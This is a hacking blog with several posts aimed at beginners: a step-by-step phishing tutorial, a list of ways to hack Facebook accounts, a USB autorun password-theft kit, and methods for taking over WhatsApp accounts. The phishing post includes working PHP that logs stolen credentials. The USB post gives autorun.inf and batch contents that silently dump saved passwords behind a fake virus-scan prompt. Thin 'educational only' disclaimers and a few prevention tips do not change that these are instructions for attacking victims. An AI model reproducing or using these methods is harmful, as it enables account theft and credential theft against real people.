Followers

Saturday, 5 July 2014

All About Phishing Scam And Hacking

All About Phishing Scam And Hacking





we are discussing the easiest way of hacking an Email account i'e Phishing scam . Definition of phishing, what is a phishing scam, how it works and how to hack an email account using phishing scam more efficiently.
Phishing scam is one of the easiest and the oldest way of hacking an email account. All beginner hackers should know about this.so lets go for it

Read this post carefully and leave your Feedback and queries in comments .
and please follow our blog, and also follow us on g+.


Firtly Lets See What is Phishing?

 In simple language phishing scam is creating fake pages to steal user credentials like username,password,phone no,etc.


Steps:-
1) First you need a Phisher. Phisher is a set of files used to fool someone .It consist of:-
i) Web page which appears to be same as that of victims account site.
i) A php script which posts the data (credentials)into a text file
iii) Text file in which credentials are saved.

2) Creating a Phisher?
2.1) Creating exact copy of the login page of site: Open that site in your bowser ,rightclick any where in free space and then click on view source.
2.2) Copy the entire source to notepad.

2.3)Editing source code :
Press“Ctrl+a” then “ctrl+f” (select all+find ) , then a dialogue box will appear , type “action”(without quotes) and press enter.
The word action will be highlighted in the notepad.You will then be having a line saying:
**action=”http://www.facebook.com/login.php?login_attempt=1″**
2.4)Change this with **action=”post.php”**(double quotes are necessary),and save
it as index.html.

2.5)Creating a Phishing script :
    <?php
    header ('Location: http://www.myhost.com/errorpage.html');
    $handle = fopen("usernames.txt", "a");
    foreach($_POST as $variable => $value)
    {
       fwrite($handle, $variable);
       fwrite($handle, "=");
       fwrite($handle, $value);
       fwrite($handle, "\r\n");
    }
    fwrite($handle, "\r\n");
    fclose($handle);
    exit;
    ?>

    copy the code to notepad and change**’Location:http://www.myhost.com/errorpage.html’**
    with the url of the site you want to open after victim presses “Login” button like if you want your victim to be redirected to yahoo.com change **‘Location:http://www.yahoo.com/’**
    and save it as “post.php”.

    2.6) Create a log file: It is a file which contains all usernames and passwords . Open
    notepad and save it as **usernames.txt**.

    3) Now you need a free web hosting account .you can easily find some free hosts on google or try these:-
    zymic.com
    t35.com
    my3 gb.com
    Create account on any of these sites for free hosting plan.
    4)After creating account just upload the three files to your web hosting account.
    5)You are ready for the attack.Just send the link of your index.html to the victim.
    If he opens and tries to login , id and password will be saved in the usernames.txt file.

    6) Additional step:
    You can hide URL by encrypting it using online URL encrypters like
    is.gd
    goo.gl
    tinyurl.com
    Go to any one of the above mentioned sites, enter your URL and
    then it will encrypt the URL , copy the encrypted URL and then send it to Your Friends.

    Logic:
    Index.html : It is the exact copy of the Login page of a site.While editing it , we change “action=post.php” so when ever victim clicks on the Login button , Post.php will be executed.
    Post.php: It is our phishing script, it takes the data and writes it to a text file , and then loads another page specified by the “location” tag in Php file.
    usernames.txt : text file containing Passwords and Email id.

    Prevention :
    >Always check the Url before signing in . This is the most useful and effective way one can use to prevent himself from phishing .
    >Other way is to use some good Antivirus software which warns you whenever you visit a harmful site.
    Even if somehow you entered your credentials in a phisher, Immediately Change your password .

    NOTE:-This tutorial is for educational purpose only,Use at your own risk. How to Hack discourages email account hacking using phishing scams for illegal purposes.
    comp_how.ltd is not responsible for any type of loss caused due to this information!!

    Keep Visiting How to Hack


    http://comphow.blogspot.in/
                                   


Posted by at No comments:

Wednesday, 2 July 2014

6 Easiest Ways to hack a Facebook Account

6 Easiest Ways to hack a Facebook Account

1) Phishing :
The first and very basic way of hacking Facebook accounts is via Phishing. Phishing is actually creating fake web pages to steal user’s credentials like email,passwords,phone no,etc.

DRAWBACK :
Users nowadays are aware of these type of attacks and one can not be easily fooled using this attack. You need some social engineering or some social skills to trick someone.

Prevention :

  • Always check the page URL before logging in. This is the most trusted and effective way one can use to avoid himself from phishing.


  • Other way is to use some good Antivirus software which will warn you if  you visit a harmful phishing page.
    Even if somehow you have already entered your credentials in a phisher, Immediately Change your password.

2) Keylogging :
This is another good way of hacking Facebook accounts. In this type of attack a hacker simply sends an infected file having keylogger in it to the victim. If the victim executes that file on his pc, whatever he types will be mailed/uploaded to hacker’s server. The advantage of this attack is that the victim won’t know that hacker is getting every Bit of data he is typing. Another big advantage is that hacker will get passwords of all the accounts used on that PC.

DRAWBACK :
Keyloggers are often detected as threats by good antiviruses. Hacker must find a way to protect it from antivirus.
Prevention :

  • Execute the file only if you trust the sender.
  • Use online scanner such as novirusthanks.org
  • Use good antivirus and update it regularly .


3) Trojans/backdoors :
This is an advanced level topic. It consists of a server and a client. In this type of attack the attacker sends the infected server to the victim. After execution the infected server i.e. Trojan on the victim’s PC opens a backdoor and now the hacker can do whatever he wants with the victim’s PC .

DRAWBACK :
Trojans are often detected as threats by good antiviruses. Hacker must find a way to protect it from antivirus.

Prevention :
  • Execute the file only if you trust the sender.
  • Use online scanner such as novirusthanks.org
  • Use good antivirus and update it regularly .



    4)Sniffing
    It consists of stealing session in progress. In this type of attack an attacker makes connection with server and client and relays message between them, making them believe that they are talking to each other directly.
    DRAWBACK :
  • If user is logged out then attacker is also logged out and the session is lost.
  • It is difficult to sniff on SSL protected networks.

          Prevention :

  • Always use SSL secured connections.
  • Always keep a look at the url if the http:// is not changed to https:// it means that sniffing is active on your network.




    5)Social Engineering :
    This method includes guessing and fooling the clients to give their own passwords. In this type of attack, a hacker sends a fake mail which is very convincing and appealing and asks the user for his password.
    Answering the security questions also lies under this category.
    Drawback :
    It is not easy to convince someone to make him give his password.
    Guessing generally doesn’t always work ( Although if you are lucky enough it may work!).

    Prevention :

  • Never give your password to anyone
  • Don’t believe in any sort of emails which asks for your password

6) Session Hijacking
In a session hijacking attack an attacker steals victims cookies, cookies stores all the necessary logging Information about one’s account, using this info an attacker can easily hack anybody’s account. If you get the cookies of the Victim you can Hack any account the Victim is Logged into i.e. you can hack Facebook, Google, Yahoo.
Drawbacks :
  • You will be logged out when user is logged out.
  • You will not get the password of the user’s account.
  • Will not work if the user is using HTTPS connections.

Prevention :

  • Always work on SSL secured connections.
  • Always keep a look at the url if the http:// is not changed to https:// it means that sniffing is active on your network.

Keep visiting comp how and Learn hacking .
Leave your feedback and queries in commentsat end of site in contact/feedback .


http://comphow.blogspot.in/




Posted by at No comments:

How to sniff Passwords using USB Drive

How to sniff Passwords using USB Drive



Anyone can steal stored passwords from any computer and that too by using your USB drive.

Can’t believe!

Read on..
As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to sniff passwords from any computer. We need the following tools to create our rootkit.


MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.

IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0


Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…


PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.
Here is a step by step procedre to create the password hacking toolkit.
NOTE: You must temporarily disable your antivirus before following these steps.

1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.
ie: Copy the files – mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.

2. Create a new Notepad and write the following text into it
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
save the Notepad and rename it from
New Text Document.txt to autorun.inf
Now copy the autorun.inf file onto your USB pendrive.

3. Create another Notepad and write the following text onto it.
start mspass.exe /stext mspass.txtstart mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
save the Notepad and rename it from
New Text Document.txt to launch.bat
Copy the launch.bat file also to your USB drive.

Now your rootkit is ready and you are all set to sniff the passwords. You can use this pendrive on on any computer to sniff the stored passwords. Just follow these steps

1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).

2. In the pop-up window, select the first option (Perform a Virus Scan).

3. Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.

4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.
This hack works on Windows 2000, XP and Vista
http://comphow.blogspot.in/



http://comphow.blogspot.in/

Posted by at 1 comment:

Tuesday, 1 July 2014

How to hack Whatsapp account

How to hack Whatsapp account





About Whatsapp

Though I am pretty sure most of you might be knowing about whatsapp but still here is a brief into about the same.
Whatsapp Messenger is a cross platform quick messaging application. Whatsapp is assured really the foremost fashionable quick electronic messaging for smartphones. Whatsapp Messenger is accessible for iPhone, Android, Windows Phone, Blackberry and Nokia and yes, those phones can all message each other. And you all have heard of it if you are not using it. Given below are the several whatsapp hacks or tricks you should know if you are using whatsapp.

Whatsapp hack to spy on some other account

So if all of you have noticed you cannot have your whatsapp account logged in two devices. Means session is given to only one MAC address. If the MAC (Media Access Control) address of the device seeking access changes then whatsapp asks you to again verify your account.

How to Hack Whatsapp Account

All you need is to get access to victim phone to get the victims phone “MAC address along with the verifying massage” which is acquired to verify your device.
  • Get mac address on your android phone.
  • Finding MAC address on an Android Phones
  • On your phone’s home screen, click on menu, then go to setting.
  • Click on about phone.
  • Click on the status.
  • And then view your Wi-Fi MAC address.
  • As soon the message is received Push the MAC address as well as Verifying code to your server or mail it your ID. That banks on your convince.
  • Cheat your phone’s MAC address to the Victims address and install whatsapp and after that type the verify code.
  • And now its done. You get full access to the victim’s whatsapp ID. So now you can keep spying/watching your victim’s movements.
  • That means you and the victim is using the same ID from different devices.
  • Whatsapp hack to use it by not using your number
  • This hack works by cheating the Whatsapp Verification Servers by sending a spoofed request for an authorisation code expected for a different phone.
  • Install Whatsapp on your device. Whatsapp now opens a counter where it sends a verification message to its servers.
  • Block the message service – it can be blocked by changing the message centre number or turning the phone into Airplane mode.
Whatsapp now gives a substitute method of verification – Select verify through SMS and fill in your email address. Once you click to send the SMS press cancel to abort the call for authorisation to the Whatsapp server.
  • Now you have to do sms Spoofing.
  • Examine your outbox and copy the message details into the spoofer application and send the spoofed verification.
  • You will now receive messages expected for the spoofed number on your mobile device and you can communicate with people under the spoofed number.

Note:- This information has been shared to create awareness among people regarding the “Ways to Hack Whatsapp” so that you can protect yourself from getting hacked. In no way do we promote misusing of the information.
Now that you know How to Hack Whatsapp account, you are good to protect yours.




http://comphow.blogspot.in/







Posted by at 1 comment:

share